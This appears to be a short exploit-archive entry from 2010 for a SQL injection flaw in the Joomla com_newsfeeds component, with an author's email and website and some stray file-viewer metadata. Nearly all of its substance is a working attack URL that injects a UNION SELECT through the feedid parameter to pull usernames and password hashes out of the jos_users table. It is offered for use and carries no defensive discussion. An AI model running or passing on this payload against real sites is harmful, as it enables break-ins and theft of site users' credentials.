17 lines
No EOL
550 B
Text
17 lines
No EOL
550 B
Text
# Exploit Title: Joomla Component com_newsfeeds SQL injection vulnerability
|
|
# Date: 30/04/2010
|
|
# Author: Archimonde
|
|
# Software Link:
|
|
# Version:
|
|
# Tested on:
|
|
# CVE :
|
|
# Code :
|
|
|
|
Email : archimondera@gmail.com
|
|
Website : xgroupvn.org - programmer.vn
|
|
|
|
index.php?option=com_newsfeeds&view=categories&feedid=[sqli]
|
|
|
|
Example:
|
|
|
|
http://[site]/index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users-- |